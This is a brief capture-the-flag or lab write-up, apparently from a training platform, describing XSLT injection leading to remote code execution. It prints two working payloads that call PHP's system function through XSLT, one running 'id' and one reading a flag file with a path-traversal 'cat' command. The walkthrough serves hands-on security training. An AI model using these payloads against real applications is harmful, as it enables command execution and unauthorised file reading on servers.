Exploiting XSLT Injection
Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.
To explore this XSLT vulnerability lets try a simple payload first in order to see if the command gets executed:

<xsl:value-of select="php:function('system','id')" />

And it worked!
After looking arround with the ls
command, we finnaly managed to get the flag with following payload:
<xsl:value-of select="php:function('system','cat ../../../../flag.txt')" />

Last updated